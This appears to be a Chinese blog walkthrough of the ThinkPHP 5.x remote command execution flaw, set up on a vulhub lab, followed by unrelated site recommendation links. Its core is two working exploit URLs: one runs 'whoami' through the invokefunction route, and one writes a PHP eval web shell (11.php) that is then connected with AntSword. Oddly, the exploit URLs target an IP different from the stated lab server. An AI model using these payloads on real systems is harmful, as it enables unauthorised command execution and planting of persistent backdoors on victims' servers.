Thinkphp(TP)框架漏洞攻略

故事与他6452025-03-26 2:07

Thinkphp5x远程命令执⾏及getshell

环境配置

云服务器:121.40.229.129:8080

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

访问靶场:http://121.40.229.129:8080/

远程命令执⾏

http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

根⽬录⽣成11.php ⽂件

http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%22%3C?php%20@eval(\$_POST[cmd]);?%3E%22%20%3E11.php

使用蚁剑连接成功

相关推荐
济61712 分钟前
linux(第十四期)--Uboot移植(2)-- 在U-Boot 中添加自己的开发板-- Ubuntu20.04
linux·运维·服务器
ben9518chen16 分钟前
嵌入式linux操作系统简介
linux·运维·服务器
小康小小涵25 分钟前
WSL2安装与移植到F盘
运维·服务器
小宇的天下34 分钟前
Calibre nmDRC Results(19-1)
服务器·数据库·oracle
Florence231 小时前
cuFuncSetCacheConfig
linux·运维·服务器
不法1 小时前
java查看安卓证书信息
android
儿歌八万首1 小时前
Jetpack Compose 动画实战:让你的 UI 动起来
android·kotlin·动画·compose
Petal9909122 小时前
内核调试:Linux编译内核源码为deb并更新内核
linux·运维·服务器
千里马学框架2 小时前
如何改进车载三分屏SplitScreen启动交互方式?
android·智能手机·分屏·aaos·安卓framework开发·车载开发·3分屏
Python_Study20252 小时前
制造业数据采集系统选型指南:从技术挑战到架构实践
大数据·网络·数据结构·人工智能·架构
热门推荐
01GitHub 镜像站点02Labelme从安装到标注:零基础完整指南03安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)04Linux下V2Ray安装配置指南05jdk21下载、安装(Windows、Linux、macOS)06【踩坑笔记】50系显卡适配的 PyTorch 安装07Opencode CLI 安装成功,但是启动失败08手把手教你通过Gemini3 pro 学生认证,白用一年,手慢无!09Claude Code Plan 模式完全指南:从入门到精通10全球最强模型Grok4,国内已可免费使用!(附教程)